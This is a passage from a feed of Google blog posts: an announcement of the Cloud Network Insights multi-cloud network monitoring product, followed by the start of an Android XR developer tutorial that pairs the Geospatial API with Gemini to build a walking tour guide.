    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In today’s digital landscape, the network is no longer confined to a single data center or even a single cloud provider. Enterprises are increasingly adopting cross-cloud strategies, connecting Google Cloud workloads to on-premises environments, other clouds like AWS and Azure, and a vast array of internet-facing applications. While this flexibility drives innovation, it can also introduce significant operational complexity. When a user experiences degradation in application performance, the critical question remains: Is it the network, the application, or something else?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce the general availability of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/network-intelligence-center/docs/cloud-network-insights/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Network Insights&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, an out-of-the-box, Google Cloud-native solution that provides comprehensive visibility into network and digital experience performance across complex multi-cloud, and hybrid environments.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Closing the visibility gap with active monitoring&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights, offered in &lt;/span&gt;&lt;a href="https://investors.broadcom.com/news-releases/news-release-details/broadcom-expands-collaboration-google-cloud-cloud-network" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;partnership with Broadcom AppNeta&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, expands your observability beyond Google Cloud to your entire global deployment. By utilizing active synthetic probing, the solution monitors network routes even when no user traffic is present, allowing teams to be proactive rather than reactive.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether the source of degradation is in the cloud, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;on-premises data centers, internet applications,&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; ISPs, or last-mile connectivity, Cloud Network Insights helps you pinpoint the exact location of the bottleneck.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights integrates directly into the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Observability suite&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, bringing sophisticated network intelligence into the tools you already use. With Cloud Network Insights, you get:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;End-to-end network path visibility:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Gain a hop-by-hop visualization of the network path between your sources and destinations. Monitor critical metrics like round-trip time (RTT), packet loss, and jitter across networks you don’t directly manage.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Digital experience insights:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Go beyond the network layer to monitor &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;digital experience for web applications&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. Measure DNS resolution times, HTTP response codes, and full browser page-load times to identify whether an application's degradation is due to the network or the application itself.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Proactive detection and alerting:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Use synthetic testing to identify performance dips before they impact your customers. Alarms are integrated with Cloud Monitoring and Cloud Logging, enabling alerting via email, Slack, or PagerDuty.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SLA validation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Arm your team with the data needed to verify if ISPs and service providers are meeting their performance commitments.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Rapid root-cause analysis: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Quickly differentiate between network problems, application-level issues, or browser performance impacts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Integrated monitoring:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Access metrics and logs directly within Google Cloud, leveraging Cloud Monitoring and Cloud Logging for dashboards and alerting. Utilize the open partner ecosystem of Google Cloud as well as support for the OpenTelemetry protocol for metrics and logs, allowing direct ingestion by OTel SDKs and collectors.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agentic workload monitoring:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Use synthetic testing to monitor connectivity and network performance to help ensure optimal connectivity to your agents and tools.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1-network paths low res" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/1-network_paths_low_res.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Network performance and multi-path routes to/from Google Cloud, AWS, and Azure in one view&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How it works: active synthetic probing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights uses active synthetic probing technology that consists of three main components: &lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Monitoring Points:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You deploy lightweight software agents, called Monitoring Points, into critical network segments, such as a central VPC, a remote branch, or an on-premises data center. These can be deployed as containers or virtual machines.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Synthetic probes:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; These Monitoring Points send small, frequent bursts of synthetic traffic (simulating a user or application) to a target destination. This allows you to monitor performance 24/7, even when no real users are on the network.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data synchronization:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Monitoring Points send real-time performance telemetry to a central backend service. This data is then synchronized back to Google Cloud, with metrics exported to Cloud Monitoring, and alarms and events sent to Cloud Logging.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Core capabilities&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; supports two primary types of monitoring to give you a full picture of your infrastructure:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;1. Network performance monitoring (Layers 3 and 4)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This provides a hop-by-hop visualization of the network between a source and a destination, including.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Metrics captured:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Round-trip time (RTT), packet loss, jitter, and path changes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Single-ended mode:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The agent probes an external target (like a URL, IP address or an API endpoint) that doesn't have a Monitoring Point installed.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Dual-ended mode:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Monitoring Point probes another Monitoring Point. This provides richer data, including precise one-way latency and the ability to detect asymmetric routing (when data takes a different path going out than it does coming back).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_d8twiu8.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Network path metrics in Google Cloud console&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;2. Digital experience monitoring (Layer 7)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With digital experience monitoring, you can track the end-to-end experience of a web application. Here, you can choose from:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Browser mode:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Uses a real browser engine (Selenium) to load full web pages, execute JavaScript, and render content. It measures complete page-load times to validate the actual user experience.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;HTTP mode:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Sends synthetic HTTP/S requests to a URL or API endpoint. This is a lightweight check for server availability, response time, and DNS/TLS performance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_VbaHlX5.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Intelligence and automation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights also offers a variety of monitoring and troubleshooting capabilities. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Proactive alarms: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Network Insights leverages auto-baselining to establish dynamic performance thresholds based on your historical metric data. If a metric deviates from your defined parameters, the system instantly triggers an event in Google Cloud, routing alerts directly to your team via email, Slack, or PagerDuty.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Monitoring policies:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You can automate monitoring setups across large-scale environments by defining policies that dynamically create or remove paths based on custom tags. For instance, you can automatically track a core web application's performance from specific geographic regions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Root-cause analysis:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Because Cloud Network Insights extends visibility into traditionally "unwatched" areas like ISPs and transit networks, it instantly pinpoints whether a slowdown is occurring within Google Cloud, at the ISP level, or inside another cloud environment like AWS or Azure.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;AI-driven insights:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; With integration to Gemini Cloud Assist, you can use natural language to interrogate Cloud Network Insights telemetry alongside your broader infrastructure data. Rather than manually pivoting between dashboards, ask Gemini to cross-reference specific Cloud Network Insights metrics against other Google Cloud metrics, reducing mean time to resolution (MTTR).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What customers are saying&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are already seeing strong interest from customers looking to simplify their cross-cloud operations. Organizations like Sabre and Pexip are already using Cloud Network Insights to gain clarity in their hybrid environments.&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"In an environment as complex and high-scale as Sabre’s, total visibility isn't just a luxury — it's a requirement for operational resilience. Cloud Network Insights will enable us to further shift our posture towards proactive optimization. By providing granular, real-time telemetry across our global cloud footprint, it helps eliminate the traditional 'black box' of the network, allowing our teams to resolve bottlenecks before they impact the traveler experience." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;- Alfredo Rodriguez, VP of Cloud and Infrastructure, Sabre&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;“Cloud Network Insights closes the 'visibility gap' between the private corporate network and the public cloud, empowering our joint customers to pinpoint performance bottlenecks in seconds rather than hours.”&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; - Alan Davidson, CIO, Broadcom&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=MR6dUJKFU4I"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Pexip improves network health with Cloud Network Insights&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=MR6dUJKFU4I"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Navigating complex digital ecosystems shouldn't mean sacrificing visibility. Cloud Network Insights bridges the gap across multi-cloud and hybrid environments by combining deep network performance metrics with digital experience monitoring. Coupled with direct integrations into Google Cloud Observability and Gemini Cloud Assist, your teams are empowered with intelligent alerting, robust SLA validation, and rapid root-cause analysis. We look forward to helping you gain a clearer, unified view of your Cross-Cloud Network.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can get started in the Google Cloud &lt;/span&gt;&lt;a href="https://console.cloud.google.com/net-intelligence/cloud-network-insights/onboarding"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; today. To learn more:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Explore our&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/network-intelligence-center/docs/cloud-network-insights/overview"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;product documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for deep dives into deploying Monitoring Points and configuring policies.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Check out the latest&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/network-intelligence-center/docs/release-notes"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;release notes&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to stay updated on new features.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Watch the &lt;/span&gt;&lt;a href="https://youtu.be/KJ_Qrztildw?si=XKqpAM9yL44HqsR5" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;overview video&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hear more about the partnership between Google Cloud and Broadcom: &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://youtu.be/XNaFAI5JWnU?si=yLk9SaSK7BbUIxJb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Alan Davidson, CIO, Broadcom talks with Rob Enns, VP/GM, Google Cloud Networking&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://youtu.be/nBdUPRbEFYw?si=BOJx67Lulrl5QDVR" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Michel Melillo, Head of Network Observability, Broadcom chats with Raj Gulani, Director of Product Management, Google Cloud&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/networking/cloud-network-insights-end-to-end-cross-cloud-observability/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-17T19:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/06/android-xr-geospatial-api-gemini.html</id>
    <title>Building a Mixed-Reality Tour Guide with Android XR, the Geospatial API, and Gemini</title>
    <updated>2026-06-17T17:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPMPSARPc5BDPn2jkintRF5Ph3Mm_hgA69Fbs7mJUhVAD82MqCt_c0voEyFYP4JT94VW-ZZ8a2tVqPjLVd1qB5cp49ZHwm16bwRTMgWaUzHU4FkSYtQKbqCI5FsUMmz81ODrauZDg1ObgZLLtHQyrhFp8jLAirphxAt_Kcx_62-1BOgCsr5OPD0aHIhBc/s1234/MM%20Android%20XR%20Geospatial%20V02_Meta.png" style="display: none;" /&gt;&lt;div&gt;&lt;i&gt;Posted by Coco Fatus, UX Designer, Alon Hetzroni, UX Engineer, Azin Mehrnoosh, Product Manager Android XR&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWFOH3TSVglPITomakfBEaRLYrUQ7UflbMVCn7AHdljoQ5oIzyr4zwLTTObPy7WeE2qqvVyyutAGwCKimnBmk-o2SpsqUM-pIzVR2X-tfqLa7Oi9cffrJ1fd3SWjZXLEYQcZHUksYKRszf3FzReJ-JfVR-PdlYk3UsSqIlDQFNx8cbI0UYajLywvMkf0o/s8659/MM%20Android%20XR%20Geospatial%20V02_Blog.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWFOH3TSVglPITomakfBEaRLYrUQ7UflbMVCn7AHdljoQ5oIzyr4zwLTTObPy7WeE2qqvVyyutAGwCKimnBmk-o2SpsqUM-pIzVR2X-tfqLa7Oi9cffrJ1fd3SWjZXLEYQcZHUksYKRszf3FzReJ-JfVR-PdlYk3UsSqIlDQFNx8cbI0UYajLywvMkf0o/s16000/MM%20Android%20XR%20Geospatial%20V02_Blog.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;div&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=1KOO2lqsdaA"&gt;At this year's Google I/O&lt;/a&gt;, we announced an update for spatial experiences: the &lt;a href="https://developer.android.com/reference/kotlin/androidx/xr/arcore/Geospatial"&gt;Geospatial API&lt;/a&gt; is now available as a preview in &lt;a href="https://developer.android.com/develop/xr/jetpack-xr-sdk/arcore"&gt;ARCore for Jetpack XR&lt;/a&gt;. By bringing Google's Visual Positioning System (VPS) to Android XR, Android XR enables anchoring digital content to the physical world with sub-meter accuracy and precise orientation in supported areas.* To explore what the Geospatial API could unlock, our team built a demo: the XR Geospatial Tour.&lt;/p&gt;

&lt;p&gt;Imagine walking into a new city, putting on a pair of wired XR glasses (like the upcoming XREAL Project Aura), and instantly having a knowledgeable, local guide showing you around. You don't need to stare down at a 2D map—instead, 3D models gently guide your path, and an intelligent voice tells you about the historical landmarks right in front of you. We combined the &lt;a href="https://developer.android.com/reference/kotlin/androidx/xr/arcore/Geospatial"&gt;Geospatial APIs&lt;/a&gt;, &lt;a href="https://firebase.google.com/docs/ai-logic"&gt;Gemini API using Firebase AI Logic&lt;/a&gt;, &lt;a href="https://ai.google.dev/gemini-api/docs/maps-grounding"&gt;Google Maps Grounding&lt;/a&gt;, and &lt;a href="https://developer.android.com/develop/xr/jetpack-xr-sdk"&gt;Jetpack XR SDK&lt;/a&gt; to create a hands-free, immersive walking tour experience.&lt;/p&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
  
&lt;p style="font-size: 0.85em; font-style: italic; line-height: 1.5; margin: 0px 0px 24px;"&gt;*Disclaimer: Video and Tour Guide application are for demonstration purposes only. Some sequences have been shortened. Any hardware depicted may be under development; final product details may differ.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;Let’s walk through the implementation details and show how we tied these APIs together to build a world-scale spatial experience.&lt;/p&gt;

&lt;h3 style="text-align: left;"&gt;1. Pinpointing the User with ARCore Geospatial API (VPS)&lt;/h3&gt;
&lt;p style="text-align: left;"&gt;Enhance your navigation experience on XR by combining the power of GPS with the precision of VPS. The accuracy and precise orientation that comes with VPS allows 3D waypoints to align with the physical world.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;This is why the Geospatial API on Android XR can help you build custom experiences. By using advanced computer vision, VPS tries to provide a &lt;a href="https://developer.android.com/reference/kotlin/androidx/xr/runtime/math/GeospatialPose"&gt;GeospatialPose&lt;/a&gt; (including latitude, longitude, and heading) that is more accurate than GPS.&lt;/p&gt;

&lt;p style="text-align: left;"&gt;Here's how we retrieve the user's Geospatial pose by mapping the device's orientation to a Geospatial coordinate:&lt;/p&gt;
&lt;pre&gt;&lt;div style="text-align: left;"&gt;// Retrieve the current geospatial pose from the ARCore session&lt;/div&gt;&lt;code&gt;&lt;div style="text-align: left;"&gt;val result = geospatial.createGeospatialPoseFromPose(arDevice.state.value.devicePose)&lt;/div&gt;&lt;div style="text-align: left;"&gt;if (result is CreateGeospatialPoseFromPoseSuccess) {&lt;/div&gt;&lt;div style="text-align: left;"&gt;    val pose = result.pose&lt;/div&gt;&lt;div style="text-align: left;"&gt;    Log.d("VPS", "Accurate Location: ${pose.latitude}, ${pose.longitude}")&lt;/div&gt;&lt;div style="text-align: left;"&gt;}&lt;/div&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;p style="text-align: left;"&gt;Because the entire experience relies on this accuracy, we monitor the horizontalAccuracy and orientationYawAccuracy until they meet our thresholds. If the user is indoors or in an unrecognized area, we prompt them to "walk to an outdoor public space and look around".&lt;/p&gt;

&lt;h3 style="text-align: left;"&gt;2. Crafting the Itinerary with Gemini API &amp;amp; Google Maps Grounding&lt;/h3&gt;
&lt;p style="text-align: left;"&gt;Once we have a location, we use the &lt;a href="https://firebase.google.com/docs/ai-logic"&gt;Gemini API using Firebase AI Logic&lt;/a&gt; to prompt the Gemini model to act as a local tour guide. We pass the user's coordinates to the model and ask it to output a structured JSON response containing nearby walking tours:&lt;/p&gt;

&lt;pre&gt;&lt;div style="text-align: left;"&gt;   val configForTools = ToolConfig(&lt;/div&gt;&lt;code&gt;&lt;div style="text-align: left;"&gt;      functionCallingConfig = null,&lt;/div&gt;&lt;div style="text-align: left;"&gt;      retrievalConfig = retrievalConfig {&lt;/div&gt;&lt;div style="text-align: left;"&gt;        latLng = FirebaseLatLng(pose.latitude, pose.longitude)&lt;/div&gt;&lt;div style="text-align: left;"&gt;        languageCode = "en"&lt;/div&gt;&lt;div style="text-align: left;"&gt;      }&lt;/div&gt;&lt;div style="text-align: left;"&gt;    )&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;    val responseJsonSchema = Schema.obj(&lt;/div&gt;&lt;div style="text-align: left;"&gt;      mapOf(&lt;/div&gt;&lt;div style="text-align: left;"&gt;        "locationIntro" to Schema.string(),&lt;/div&gt;&lt;div style="text-align: left;"&gt;        "tours" to Schema.array(&lt;/div&gt;&lt;div style="text-align: left;"&gt;          Schema.obj(&lt;/div&gt;&lt;div style="text-align: left;"&gt;            mapOf(&lt;/div&gt;&lt;div style="text-align: left;"&gt;              "title" to Schema.string(),&lt;/div&gt;&lt;div style="text-align: left;"&gt;              "description" to Schema.string(),&lt;/div&gt;&lt;div style="text-align: left;"&gt;              "stops" to Schema.array(&lt;/div&gt;&lt;div style="text-align: left;"&gt;                Schema.obj(&lt;/div&gt;&lt;div style="text-align: left;"&gt;                  mapOf(&lt;/div&gt;&lt;div style="text-align: left;"&gt;                    "name" to Schema.string(),&lt;/div&gt;&lt;div style="text-align: left;"&gt;                    "detailedName" to Schema.string(),&lt;/div&gt;&lt;div style="text-align: left;"&gt;                    "description" to Schema.string()&lt;/div&gt;&lt;div style="text-align: left;"&gt;                  )&lt;/div&gt;&lt;div style="text-align: left;"&gt;                )&lt;/div&gt;&lt;div style="text-align: left;"&gt;              )&lt;/div&gt;&lt;div style="text-align: left;"&gt;            )&lt;/div&gt;&lt;div style="text-align: left;"&gt;          )&lt;/div&gt;&lt;div style="text-align: left;"&gt;        )&lt;/div&gt;&lt;div style="text-align: left;"&gt;      )&lt;/div&gt;&lt;div style="text-align: left;"&gt;    )&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;    val model = Firebase.ai(backend = GenerativeBackend.googleAI()).generativeModel(&lt;/div&gt;&lt;div style="text-align: left;"&gt;      modelName = "gemini-3.5-flash",&lt;/div&gt;&lt;div style="text-align: left;"&gt;      tools = listOf(Tool.googleMaps()),&lt;/div&gt;&lt;div style="text-align: left;"&gt;      generationConfig = generationConfig {&lt;/div&gt;&lt;div style="text-align: left;"&gt;        responseMimeType = "application/json"&lt;/div&gt;&lt;div style="text-align: left;"&gt;        responseSchema = responseJsonSchema&lt;/div&gt;&lt;div style="text-align: left;"&gt;      }&lt;/div&gt;&lt;div style="text-align: left;"&gt;    )&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;   val result = model.generateContent("The user is at latitude ${pose.latitude} and longitude ${pose.longitude}. Generate exactly 3 diverse tours near this location (e.g., historical, food, nature). All tour ideas should be walking distance only.")&lt;/div&gt;&lt;/code&gt;&lt;/pre&gt;
